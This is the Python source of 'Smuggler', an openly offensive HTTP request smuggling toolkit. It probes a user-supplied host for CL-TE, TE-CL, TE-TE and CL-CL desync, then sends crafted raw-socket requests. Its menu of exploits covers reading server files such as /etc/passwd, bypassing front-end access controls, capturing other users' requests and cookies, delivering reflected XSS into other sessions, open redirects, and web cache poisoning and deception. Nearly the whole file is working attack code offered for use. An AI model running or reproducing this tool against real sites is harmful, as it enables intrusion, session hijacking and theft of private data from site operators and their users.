smuggler.py 29 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369370371372373374375376377378379380381382383384385386387388389390391392393394395396397398399400401402403404405406407408409410411412413414415416417418419420421422423424425426427428429430431432433434435436437438439440441442443444445446447448449450451452453454455456457458459460461462463464465466467468469470471472473474475476477478479480481482483484485486487488489490491492493494495496497498499500501502503504505506507508509510511512513514515516517518519520521522523524525526527528529530531532533534535536537538539540541542543544545546547548549550551552553554555556557558559560561562563564565566567568569570571572573574575576577578579580581582583584585586587588589590591592593594595596597598599600601602603604605606607608609610611612613614615616617618619620621622623624625626627628629630631632633634635636637638639640641642643
  1. #!/usr/bin/env python3
  2. # -*- coding: utf-8 -*-"
  3. """
  4. Smuggler (HTTP -Smuggling- Attack Toolkit) - 2020 - by psy (epsylon@riseup.net)
  5. You should have received a copy of the GNU General Public License along
  6. with PandeMaths; if not, write to the Free Software Foundation, Inc., 51
  7. Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
  8. """
  9. import sys, socket, ssl
  10. VERSION = "v0.1_beta"
  11. RELEASE = "25_04_2020"
  12. SOURCE1 = "https://code.03c8.net/epsylon/smuggler"
  13. SOURCE2 = "https://github.com/epsylon/smuggler"
  14. CONTACT = "epsylon@riseup.net - (https://03c8.net)"
  15. try:
  16. import payloads.payloads # import payloads
  17. except:
  18. print ("\n[Info] Try to run the tool with Python3.x.y... (ex: python3 smuggler.py) -> [EXITING!]\n")
  19. sys.exit()
  20. VULNERABLE_LIST = []
  21. def set_target():
  22. target = input("\n + Enter DOMAIN/IP (ex: 'http(s)://www.target.com'): ").lower()
  23. if target.startswith("http://"):
  24. target = target.replace("http://","")
  25. port = 80
  26. SSL = False
  27. elif target.startswith("https://"):
  28. target = target.replace("https://","")
  29. port = 443
  30. SSL = True
  31. else:
  32. print("\n[Error] Target is invalid: '"+str(target)+"'\n")
  33. print("="*50)
  34. sys.exit()
  35. method = input("\n + Enter HTTP Method (ex: POST): ").upper()
  36. if method == "GET" or method == "POST":
  37. pass
  38. else:
  39. print("\n[Error] Method is invalid: '"+str(method)+"'\n")
  40. print("="*50)
  41. sys.exit()
  42. path = input("\n + Enter PATH (ex: '/'): ")
  43. if path == "":
  44. path = "/"
  45. return target, port, SSL, method, path
  46. def detect(): # detect menu
  47. target, port, SSL, method, path = set_target() # set target
  48. print("\n"+"="*50 + "\n")
  49. print("[Info] Starting HTTP Smuggling detection ...")
  50. payloads_dsync = payloads.payloads.payloads # load payloads
  51. addr = (target, port)
  52. print("")
  53. for payload in payloads_dsync:
  54. attack_type = payload.split("#")[0]
  55. payload_type = payload.split("#")[1]
  56. print("="*50)
  57. print("Trying payload: ["+str(attack_type)+"]")
  58. print("="*50+"\n")
  59. payload = method+" "+path+" HTTP/1.1\r\nHost: "+target+"\r\n"+payload_type
  60. print("+ PAYLOAD:\n")
  61. print(payload)
  62. send_payload(attack_type, payload, addr, SSL) # send each payload
  63. show_results(target, port, method, path) # show final results
  64. def send_payload(attack_type, payload, addr, SSL):
  65. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  66. if SSL == True: # ssl
  67. ss = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_SSLv23)
  68. try:
  69. if SSL == True: # ssl
  70. ss.connect(addr)
  71. else:
  72. s.connect(addr)
  73. except:
  74. print("-"*45)
  75. print("[Error] Generating socket... -> [PASSING!]")
  76. print("-"*45+"\n")
  77. s.close()
  78. if SSL == True: # ssl
  79. ss.close()
  80. return
  81. for i in range(1,20): # 20x tests
  82. if SSL == True: # ssl
  83. ss.send(payload.encode('utf-8'))
  84. else:
  85. s.send(payload.encode('utf-8'))
  86. datas=""
  87. while 1:
  88. if SSL == True: # ssl
  89. data = ss.recv(1024)
  90. else:
  91. data = s.recv(1024)
  92. if not data:
  93. break
  94. datas += str(data.decode('utf-8'))
  95. print("\n+ REPLY:\n")
  96. print(str(datas))
  97. resp_c=0
  98. resp=""
  99. wait=False
  100. for line in datas.split('\n'):
  101. if line.startswith('HTTP/1.1 400 BAD_REQUEST') or line.startswith('HTTP/1.1 400 Bad Request') or line.startswith('HTTP/1.1 400 BAD REQUEST'):
  102. wait=True
  103. elif line.startswith('HTTP/1.0 400 BAD_REQUEST') or line.startswith('HTTP/1.0 400 Bad Request') or line.startswith('HTTP/1.0 400 BAD REQUEST'):
  104. wait=True
  105. elif line.startswith('HTTP/1.1 '):
  106. wait=False
  107. resp_c+=1
  108. if not wait:
  109. resp += line+'\n'
  110. print("-"*45)
  111. if resp_c > 0:
  112. print ("PAYLOAD: ["+str(attack_type)+"] is WORKING! ;-)")
  113. VULNERABLE_LIST.append(attack_type) # add attack type for results
  114. else:
  115. print ("PAYLOAD: ["+str(attack_type)+"] is NOT working...")
  116. print("-"*45+"\n")
  117. s.close()
  118. if SSL == True: # ssl
  119. ss.close()
  120. def show_results(target, port, method, path):
  121. print("="*50)
  122. print("\n+ FINAL RESULTS: -HTTP Smuggling- Attack\n")
  123. print("-"*45+"\n")
  124. print(" - TARGET: "+str(target)+":"+str(port))
  125. print(" - Method: "+str(method))
  126. print(" - Path : "+str(path))
  127. CLCL = False
  128. TETE = False
  129. TECL = False
  130. CLTE = False
  131. if VULNERABLE_LIST:
  132. print("\n - STATUS: [ VULNERABLE !!! ]\n")
  133. for v in VULNERABLE_LIST: # resume vulnerable payloads found
  134. if v.startswith("CL-CL") and CLCL == False: # CL-CL
  135. print(" * [CL-CL]: [Front-end: Content Length] <-> [Back-end: Content Length]")
  136. CLCL = True
  137. elif v.startswith("TE-TE") and TETE == False: # TE-TE
  138. print(" * [TE-TE]: [Front-end: Transfer-Encoding] <-> [Back-end: Transfer-Encoding]")
  139. TETE = True
  140. elif v.startswith("TE-CL") and TECL == False: # TE-CL
  141. print(" * [TE-CL]: [Front-end: Transfer-Encoding] <-> [Back-end: Content Length]")
  142. TECL = True
  143. elif v.startswith("CL-TE") and CLTE == False: # CL-TE
  144. print(" * [CL-TE]: [Front-end: Content-Length] <-> [Back-end: Transfer-Encoding]")
  145. CLTE = True
  146. else:
  147. pass
  148. else:
  149. print("\n - STATUS: [ NOT VULNERABLE ]")
  150. print("\n"+"="*50+"\n")
  151. def exploit(): # exploit menu
  152. exploit = input("\n+ SELECT EXPLOIT:\n\n (0) Steal files (ex: '/etc/passwd')\n (1) Bypass Front-End Security Controls\n (2) Reveal Front-End Rewriting\n (3) Capture Users Requests\n (4) Re-Exploit a XSS Reflected\n (5) Turn into an Open-Redirect\n (6) Web Cache Poisoning\n (7) Web Cache Deception\n\n")
  153. if exploit == "0": # steal files
  154. exploit_steal()
  155. elif exploit == "1": # bypass front-end
  156. exploit_bypass()
  157. elif exploit == "2": # reveal front-edn rewriting
  158. exploit_reveal()
  159. elif exploit == "3": # capture users requests
  160. exploit_capture()
  161. elif exploit == "4": # re-exploit xss reflection
  162. exploit_xss()
  163. elif exploit == "5": # turn into open-redirect 'zombie'
  164. exploit_openredirect()
  165. elif exploit == "6": # webcache poisoning
  166. exploit_poison()
  167. elif exploit == "7": # webcache deception
  168. exploit_deception()
  169. else: # exit
  170. print ("[Info] Not any valid exploit selected... -> [EXITING!]\n")
  171. sys.exit()
  172. def send_exploit(addr, SSL, exploit):
  173. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  174. if SSL == True: # ssl
  175. ss = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_SSLv23)
  176. try:
  177. if SSL == True: # ssl
  178. ss.connect(addr)
  179. else:
  180. s.connect(addr)
  181. except:
  182. print("\n"+"-"*45)
  183. print("[Error] Generating socket... -> [PASSING!]")
  184. print("-"*45+"\n")
  185. s.close()
  186. if SSL == True: # ssl
  187. ss.close()
  188. return
  189. if SSL == True: # ssl
  190. ss.send(exploit.encode('utf-8'))
  191. else:
  192. s.send(exploit.encode('utf-8'))
  193. datas=""
  194. while 1:
  195. if SSL == True: # ssl
  196. data = ss.recv(1024)
  197. else:
  198. data = s.recv(1024)
  199. if not data:
  200. break
  201. datas += str(data.decode('utf-8'))
  202. print("\n+ REPLY:\n")
  203. print(str(datas))
  204. def exploit_bypass():
  205. print("\n"+"="*50 + "\n")
  206. print("[Info] Trying to Bypass Front-End Security Controls...")
  207. target, port, SSL, method, path = set_target() # set target
  208. addr = (target, port)
  209. restricted_path = input("\n + Enter RESTRICTED ZONE (ex: '/admin'): ")
  210. content_length = input("\n + Enter CONTENT-LENGTH (default: '50'): ")
  211. request_type = input("\n + Enter PAYLOAD MODE (ex: 'TE-CL') (default: 'ALL'): ")
  212. try:
  213. content_length = int(content_length)
  214. except:
  215. content_length = 50
  216. if not content_length:
  217. content_length = 50
  218. exploits_dsync = payloads.payloads.exploits # load exploits
  219. for exp in exploits_dsync:
  220. if "EXPLOIT-1" in exp: # extract all exploit-1 (bypass front-end ACLs)
  221. if request_type == "TE-CL":
  222. if "TE-CL" in exp: # exploit 1 TE-CL
  223. exploit_bypass_armed(method, path, target, restricted_path, content_length, exp, addr, SSL)
  224. elif request_type == "CL-TE":
  225. if "CL-TE" in exp: # exploit 1 CL-TE
  226. exploit_bypass_armed(method, path, target, restricted_path, content_length, exp, addr, SSL)
  227. elif request_type == "TE-TE":
  228. if "TE-TE" in exp: # exploit 1 TE-TE
  229. exploit_bypass_armed(method, path, target, restricted_path, content_length, exp, addr, SSL)
  230. elif request_type == "CL-CL":
  231. if "CL-CL" in exp: # exploit 1 CL-CL
  232. exploit_bypass_armed(method, path, target, restricted_path, content_length, exp, addr, SSL)
  233. else: # send all!
  234. exploit = exp.split("#")[1]
  235. exploit = exploit.replace("$method", method)
  236. exploit = exploit.replace("$path", path)
  237. exploit = exploit.replace("$target", target)
  238. exploit = exploit.replace("$restricted_path", restricted_path)
  239. exploit = exploit.replace("$CL", str(content_length))
  240. print("\n"+"="*50+"\n")
  241. print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n")
  242. print(str(exploit))
  243. send_exploit(addr, SSL, exploit) # send expoit
  244. def exploit_bypass_armed(method, path, target, restricted_path, content_length, exp, addr, SSL):
  245. exploit = exp.split("#")[1]
  246. exploit = exploit.replace("$method", method)
  247. exploit = exploit.replace("$path", path)
  248. exploit = exploit.replace("$target", target)
  249. exploit = exploit.replace("$restricted_path", restricted_path)
  250. exploit = exploit.replace("$CL", str(content_length))
  251. print("\n"+"="*50+"\n")
  252. print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n")
  253. print(str(exploit))
  254. send_exploit(addr, SSL, exploit) # send expoit
  255. def exploit_reveal():
  256. print("\n"+"="*50 + "\n")
  257. print("[Info] Trying to Reveal Front-End Rewriting...")
  258. target, port, SSL, method, path = set_target() # set target
  259. addr = (target, port)
  260. parameter = input("\n + Enter PARAMETER reflected (ex: 'user'): ")
  261. content_length = input("\n + Enter CONTENT-LENGTH (default: '130'): ")
  262. request_type = input("\n + Enter PAYLOAD MODE (ex: 'TE-CL') (default: 'ALL'): ")
  263. try:
  264. content_length = int(content_length)
  265. except:
  266. content_length = 130
  267. if not content_length:
  268. content_length = 130
  269. exploits_dsync = payloads.payloads.exploits # load exploits
  270. for exp in exploits_dsync:
  271. if "EXPLOIT-2" in exp: # extract exploit-2 (reveal rewriting)
  272. if request_type == "TE-CL":
  273. if "TE-CL" in exp: # exploit 2 TE-CL
  274. exploit_reveal_armed(method, path, target, parameter, content_length, exp, addr, SSL)
  275. elif request_type == "CL-TE":
  276. if "CL-TE" in exp: # exploit 2 CL-TE
  277. exploit_reveal_armed(method, path, target, parameter, content_length, exp, addr, SSL)
  278. elif request_type == "TE-TE":
  279. if "TE-TE" in exp: # exploit 2 TE-TE
  280. exploit_reveal_armed(method, path, target, parameter, content_length, exp, addr, SSL)
  281. elif request_type == "CL-CL":
  282. if "CL-CL" in exp: # exploit 2 CL-CL
  283. exploit_reveal_armed(method, path, target, parameter, content_length, exp, addr, SSL)
  284. else: # send all!
  285. exploit = exp.split("#")[1]
  286. exploit = exploit.replace("$method", method)
  287. exploit = exploit.replace("$path", path)
  288. exploit = exploit.replace("$target", target)
  289. exploit = exploit.replace("$parameter", parameter)
  290. exploit = exploit.replace("$CL", str(content_length))
  291. print("\n"+"="*50+"\n")
  292. print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n")
  293. print(str(exploit))
  294. send_exploit(addr, SSL, exploit) # send expoit
  295. def exploit_reveal_armed(method, path, target, parameter, content_length, exp, addr, SSL):
  296. exploit = exp.split("#")[1]
  297. exploit = exploit.replace("$method", method)
  298. exploit = exploit.replace("$path", path)
  299. exploit = exploit.replace("$target", target)
  300. exploit = exploit.replace("$parameter", parameter)
  301. exploit = exploit.replace("$CL", str(content_length))
  302. print("\n"+"="*50+"\n")
  303. print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n")
  304. print(str(exploit))
  305. send_exploit(addr, SSL, exploit) # send expoit
  306. def exploit_capture():
  307. print("\n"+"="*50 + "\n")
  308. print("[Info] Trying to Capture Users Requests (cookies, other sensitive data, etc)...")
  309. target, port, SSL, method, path = set_target() # set target
  310. addr = (target, port)
  311. parameters = input("\n + Enter PARAMETERS (ex: 'csrf=SmsWiwIJ07Wg5oqX87FfUVkMThn9VzO0&postId=2&name=Admin&comment='): ")
  312. cookie = input("\n + Enter COOKIE (ex: 'session=BOe1lFDosZ9lk7NLUpWcG8mjiwbeNZAO'): ")
  313. content_length = input("\n + Enter CONTENT-LENGTH (default: '130'): ")
  314. request_type = input("\n + Enter PAYLOAD MODE (ex: 'TE-CL') (default: 'ALL'): ")
  315. try:
  316. content_length = int(content_length)
  317. except:
  318. content_length = 130
  319. if not content_length:
  320. content_length = 130
  321. exploits_dsync = payloads.payloads.exploits # load exploits
  322. for exp in exploits_dsync:
  323. if "EXPLOIT-3" in exp: # extract exploit-3 (capture users requests)
  324. if request_type == "TE-CL":
  325. if "TE-CL" in exp: # exploit 3 TE-CL
  326. exploit_capture_armed(method, path, target, parameters, cookie, content_length, exp, addr, SSL)
  327. elif request_type == "CL-TE":
  328. if "CL-TE" in exp: # exploit 3 CL-TE
  329. exploit_capture_armed(method, path, target, parameters, cookie, content_length, exp, addr, SSL)
  330. elif request_type == "TE-TE":
  331. if "TE-TE" in exp: # exploit 3 TE-TE
  332. exploit_capture_armed(method, path, target, parameters, cookie, content_length, exp, addr, SSL)
  333. elif request_type == "CL-CL":
  334. if "CL-CL" in exp: # exploit 3 CL-CL
  335. exploit_capture_armed(method, path, target, parameters, cookie, content_length, exp, addr, SSL)
  336. else: # send all!
  337. exploit = exp.split("#")[1]
  338. exploit = exploit.replace("$method", method)
  339. exploit = exploit.replace("$path", path)
  340. exploit = exploit.replace("$target", target)
  341. exploit = exploit.replace("$parameters", parameters)
  342. exploit = exploit.replace("$cookie", cookie)
  343. exploit = exploit.replace("$CL", str(content_length))
  344. print("\n"+"="*50+"\n")
  345. print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n")
  346. print(str(exploit))
  347. send_exploit(addr, SSL, exploit) # send expoit
  348. def exploit_capture_armed(method, path, target, parameters, cookie, content_length, exp, addr, SSL):
  349. exploit = exp.split("#")[1]
  350. exploit = exploit.replace("$method", method)
  351. exploit = exploit.replace("$path", path)
  352. exploit = exploit.replace("$target", target)
  353. exploit = exploit.replace("$parameters", parameters)
  354. exploit = exploit.replace("$cookie", cookie)
  355. exploit = exploit.replace("$CL", str(content_length))
  356. print("\n"+"="*50+"\n")
  357. print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n")
  358. print(str(exploit))
  359. send_exploit(addr, SSL, exploit) # send expoit
  360. def exploit_xss():
  361. print("\n"+"="*50 + "\n")
  362. print("[Info] Trying to Re-Exploit a XSS Reflected (found in HTTP Headers) into other's sessions (NOT USER INTERACTION REQUIRED!)...")
  363. target, port, SSL, method, path = set_target() # set target
  364. addr = (target, port)
  365. header = input("\n + Enter VULNERABLE HEADER (ex: 'User-Agent'): ")
  366. xss = input("\n + Enter XSS Injection (ex: '<script>alert(1)</script>'): ")
  367. content_length = input("\n + Enter CONTENT-LENGTH (default: '100'): ")
  368. request_type = input("\n + Enter PAYLOAD MODE (ex: 'TE-CL') (default: 'ALL'): ")
  369. try:
  370. content_length = int(content_length)
  371. except:
  372. content_length = 100
  373. if not content_length:
  374. content_length = 100
  375. exploits_dsync = payloads.payloads.exploits # load exploits
  376. for exp in exploits_dsync:
  377. if "EXPLOIT-4" in exp: # extract exploit-4 (re-exploit XSS)
  378. if request_type == "TE-CL":
  379. if "TE-CL" in exp: # exploit 4 TE-CL
  380. exploit_xss_armed(method, path, target, header, xss, content_length, exp, addr, SSL)
  381. elif request_type == "CL-TE":
  382. if "CL-TE" in exp: # exploit 4 CL-TE
  383. exploit_xss_armed(method, path, target, header, xss, content_length, exp, addr, SSL)
  384. elif request_type == "TE-TE":
  385. if "TE-TE" in exp: # exploit 4 TE-TE
  386. exploit_xss_armed(method, path, target, header, xss, content_length, exp, addr, SSL)
  387. elif request_type == "CL-CL":
  388. if "CL-CL" in exp: # exploit 4 CL-CL
  389. exploit_xss_armed(method, path, target, header, xss, content_length, exp, addr, SSL)
  390. else: # send all!
  391. exploit = exp.split("#")[1]
  392. exploit = exploit.replace("$method", method)
  393. exploit = exploit.replace("$path", path)
  394. exploit = exploit.replace("$target", target)
  395. exploit = exploit.replace("$header", header)
  396. exploit = exploit.replace("$xss", xss)
  397. exploit = exploit.replace("$CL", str(content_length))
  398. print("\n"+"="*50+"\n")
  399. print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n")
  400. print(str(exploit))
  401. send_exploit(addr, SSL, exploit) # send expoit
  402. def exploit_xss_armed(method, path, target, header, xss, content_length, exp, addr, SSL):
  403. exploit = exp.split("#")[1]
  404. exploit = exploit.replace("$method", method)
  405. exploit = exploit.replace("$path", path)
  406. exploit = exploit.replace("$target", target)
  407. exploit = exploit.replace("$header", header)
  408. exploit = exploit.replace("$xss", xss)
  409. exploit = exploit.replace("$CL", str(content_length))
  410. print("\n"+"="*50+"\n")
  411. print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n")
  412. print(str(exploit))
  413. send_exploit(addr, SSL, exploit) # send expoit
  414. def exploit_openredirect():
  415. print("\n"+"="*50 + "\n")
  416. print("[Info] Trying to turn an on-site redirect into an Open-Redirect (ex: UFONet 'zombie')...")
  417. target, port, SSL, method, path = set_target() # set target
  418. addr = (target, port)
  419. location = input("\n + Enter NEW LOCATION (ex: 'otherwebsite.com'): ")
  420. content_length = input("\n + Enter CONTENT-LENGTH (default: '100'): ")
  421. request_type = input("\n + Enter PAYLOAD MODE (ex: 'TE-CL') (default: 'ALL'): ")
  422. try:
  423. content_length = int(content_length)
  424. except:
  425. content_length = 100
  426. if not content_length:
  427. content_length = 100
  428. exploits_dsync = payloads.payloads.exploits # load exploits
  429. for exp in exploits_dsync:
  430. if "EXPLOIT-5" in exp: # extract exploit-5 (open-redirect)
  431. if request_type == "TE-CL":
  432. if "TE-CL" in exp: # exploit 5 TE-CL
  433. exploit_openredirect_armed(method, path, target, location, content_length, exp, addr, SSL)
  434. elif request_type == "CL-TE":
  435. if "CL-TE" in exp: # exploit 5 CL-TE
  436. exploit_openredirect_armed(method, path, target, location, content_length, exp, addr, SSL)
  437. elif request_type == "TE-TE":
  438. if "TE-TE" in exp: # exploit 5 TE-TE
  439. exploit_openredirect_armed(method, path, target, location, content_length, exp, addr, SSL)
  440. elif request_type == "CL-CL":
  441. if "CL-CL" in exp: # exploit 5 CL-CL
  442. exploit_openredirect_armed(method, path, target, location, content_length, exp, addr, SSL)
  443. else: # send all!
  444. exploit = exp.split("#")[1]
  445. exploit = exploit.replace("$method", method)
  446. exploit = exploit.replace("$path", path)
  447. exploit = exploit.replace("$target", target)
  448. exploit = exploit.replace("$location", location)
  449. exploit = exploit.replace("$CL", str(content_length))
  450. print("\n"+"="*50+"\n")
  451. print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n")
  452. print(str(exploit))
  453. send_exploit(addr, SSL, exploit) # send expoit
  454. def exploit_openredirect_armed(method, path, target, location, content_length, exp, addr, SSL):
  455. exploit = exp.split("#")[1]
  456. exploit = exploit.replace("$method", method)
  457. exploit = exploit.replace("$path", path)
  458. exploit = exploit.replace("$target", target)
  459. exploit = exploit.replace("$location", location)
  460. exploit = exploit.replace("$CL", str(content_length))
  461. print("\n"+"="*50+"\n")
  462. print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n")
  463. print(str(exploit))
  464. send_exploit(addr, SSL, exploit) # send expoit
  465. def exploit_poison():
  466. print("\n"+"="*50 + "\n")
  467. print("[Info] Trying to perform web cache poisoning...")
  468. target, port, SSL, method, path = set_target() # set target
  469. addr = (target, port)
  470. location = input("\n + Enter POISON DOMAIN/IP (ex: 'attacker-website.net'): ")
  471. script = input("\n + Enter POISON SOURCE (ex: '/static/defaced.js'): ")
  472. content_length = input("\n + Enter CONTENT-LENGTH (default: '100'): ")
  473. request_type = input("\n + Enter PAYLOAD MODE (ex: 'TE-CL') (default: 'ALL'): ")
  474. try:
  475. content_length = int(content_length)
  476. except:
  477. content_length = 100
  478. if not content_length:
  479. content_length = 100
  480. exploits_dsync = payloads.payloads.exploits # load exploits
  481. for exp in exploits_dsync:
  482. if "EXPLOIT-6" in exp: # extract exploit-6 (web cache poison)
  483. if request_type == "TE-CL":
  484. if "TE-CL" in exp: # exploit 6 TE-CL
  485. exploit_poison_armed(method, path, target, location, script, content_length, exp, addr, SSL)
  486. elif request_type == "CL-TE":
  487. if "CL-TE" in exp: # exploit 6 CL-TE
  488. exploit_poison_armed(method, path, target, location, script, content_length, exp, addr, SSL)
  489. elif request_type == "TE-TE":
  490. if "TE-TE" in exp: # exploit 6 TE-TE
  491. exploit_poison_armed(method, path, target, location, script, content_length, exp, addr, SSL)
  492. elif request_type == "CL-CL":
  493. if "CL-CL" in exp: # exploit 6 CL-CL
  494. exploit_poison_armed(method, path, target, location, script, content_length, exp, addr, SSL)
  495. else: # send all!
  496. exploit = exp.split("#")[1]
  497. exploit = exploit.replace("$method", method)
  498. exploit = exploit.replace("$path", path)
  499. exploit = exploit.replace("$target", target)
  500. exploit = exploit.replace("$location", location)
  501. exploit = exploit.replace("$script", script)
  502. exploit = exploit.replace("$CL", str(content_length))
  503. print("\n"+"="*50+"\n")
  504. print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n")
  505. print(str(exploit))
  506. send_exploit(addr, SSL, exploit) # send expoit
  507. def exploit_poison_armed(method, path, target, location, script, content_length, exp, addr, SSL):
  508. exploit = exp.split("#")[1]
  509. exploit = exploit.replace("$method", method)
  510. exploit = exploit.replace("$path", path)
  511. exploit = exploit.replace("$target", target)
  512. exploit = exploit.replace("$location", location)
  513. exploit = exploit.replace("$script", script)
  514. exploit = exploit.replace("$CL", str(content_length))
  515. print("\n"+"="*50+"\n")
  516. print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n")
  517. print(str(exploit))
  518. send_exploit(addr, SSL, exploit) # send expoit
  519. def exploit_deception():
  520. print("\n"+"="*50 + "\n")
  521. print("[Info] Trying to perform web cache deception leaking...")
  522. target, port, SSL, method, path = set_target() # set target
  523. addr = (target, port)
  524. private = input("\n + Enter RESTRICTED ZONE (ex: '/private/messages'): ")
  525. content_length = input("\n + Enter CONTENT-LENGTH (default: '100'): ")
  526. request_type = input("\n + Enter PAYLOAD MODE (ex: 'TE-CL') (default: 'ALL'): ")
  527. try:
  528. content_length = int(content_length)
  529. except:
  530. content_length = 100
  531. if not content_length:
  532. content_length = 100
  533. exploits_dsync = payloads.payloads.exploits # load exploits
  534. for exp in exploits_dsync:
  535. if "EXPLOIT-7" in exp: # extract exploit-7 (web cache deception)
  536. if request_type == "TE-CL":
  537. if "TE-CL" in exp: # exploit 7 TE-CL
  538. exploit_deception_armed(method, path, target, private, content_length, exp, addr, SSL)
  539. elif request_type == "CL-TE":
  540. if "CL-TE" in exp: # exploit 7 CL-TE
  541. exploit_deception_armed(method, path, target, private, content_length, exp, addr, SSL)
  542. elif request_type == "TE-TE":
  543. if "TE-TE" in exp: # exploit 7 TE-TE
  544. exploit_deception_armed(method, path, target, private, content_length, exp, addr, SSL)
  545. elif request_type == "CL-CL":
  546. if "CL-CL" in exp: # exploit 7 CL-CL
  547. exploit_deception_armed(method, path, target, private, content_length, exp, addr, SSL)
  548. else: # send all!
  549. exploit = exp.split("#")[1]
  550. exploit = exploit.replace("$method", method)
  551. exploit = exploit.replace("$path", path)
  552. exploit = exploit.replace("$target", target)
  553. exploit = exploit.replace("$private", private)
  554. exploit = exploit.replace("$CL", str(content_length))
  555. print("\n"+"="*50+"\n")
  556. print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n")
  557. print(str(exploit))
  558. send_exploit(addr, SSL, exploit) # send expoit
  559. def exploit_deception_armed(method, path, target, private, content_length, exp, addr, SSL):
  560. exploit = exp.split("#")[1]
  561. exploit = exploit.replace("$method", method)
  562. exploit = exploit.replace("$path", path)
  563. exploit = exploit.replace("$target", target)
  564. exploit = exploit.replace("$private", private)
  565. exploit = exploit.replace("$CL", str(content_length))
  566. print("\n"+"="*50+"\n")
  567. print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n")
  568. print(str(exploit))
  569. send_exploit(addr, SSL, exploit) # send expoit
  570. def exploit_steal():
  571. print("\n"+"="*50 + "\n")
  572. print("[Info] Trying to steal files from server...")
  573. target, port, SSL, method, path = set_target() # set target
  574. addr = (target, port)
  575. files = input("\n + Enter FILE (ex: '/etc/passwd'): ")
  576. exploits_dsync = payloads.payloads.exploits # load exploits
  577. for exp in exploits_dsync:
  578. if "EXPLOIT-0" in exp: # extract exploit-0 (steal files)
  579. exploit = exp.split("#")[1]
  580. exploit = exploit.replace("$method", method)
  581. exploit = exploit.replace("$path", path)
  582. exploit = exploit.replace("$target", target)
  583. exploit = exploit.replace("$files", files)
  584. content_length = len(files)+2 # p=len(files)
  585. exploit = exploit.replace("$CL", str(content_length))
  586. print("\n"+"="*50+"\n")
  587. print("+ PAYLOAD MODE: [CL-CL]\n")
  588. print(str(exploit))
  589. send_exploit(addr, SSL, exploit) # send expoit
  590. def print_banner():
  591. print("\n"+"="*50)
  592. print(" ____ __ __ _ _ ____ ____ _ _____ ____ ")
  593. print("/ ___|| \/ | | | |/ ___|/ ___| | | ____| _ \ ")
  594. print("\___ \| |\/| | | | | | _| | _| | | _| | |_) |")
  595. print(" ___) | | | | |_| | |_| | |_| | |___| |___| _ < ")
  596. print("|____/|_| |_|\___/ \____|\____|_____|_____|_| \_\ by psy")
  597. print('\n"HTTP -Smuggling- (DSYNC) Attacking Toolkit"')
  598. print("\n"+"-"*15+"\n")
  599. print(" * VERSION: ")
  600. print(" + "+VERSION+" - (rev:"+RELEASE+")")
  601. print("\n * SOURCES:")
  602. print(" + "+SOURCE1)
  603. print(" + "+SOURCE2)
  604. print("\n * CONTACT: ")
  605. print(" + "+CONTACT+"\n")
  606. print("-"*15+"\n")
  607. print("="*50)
  608. # sub_init #
  609. print_banner() # show banner
  610. option = input("\n+ CHOOSE: (D)etect or (E)ploit: ").upper()
  611. print("\n"+"="*50)
  612. if option == "D": # detecting phase
  613. detect()
  614. else: # trying to exploit
  615. exploit()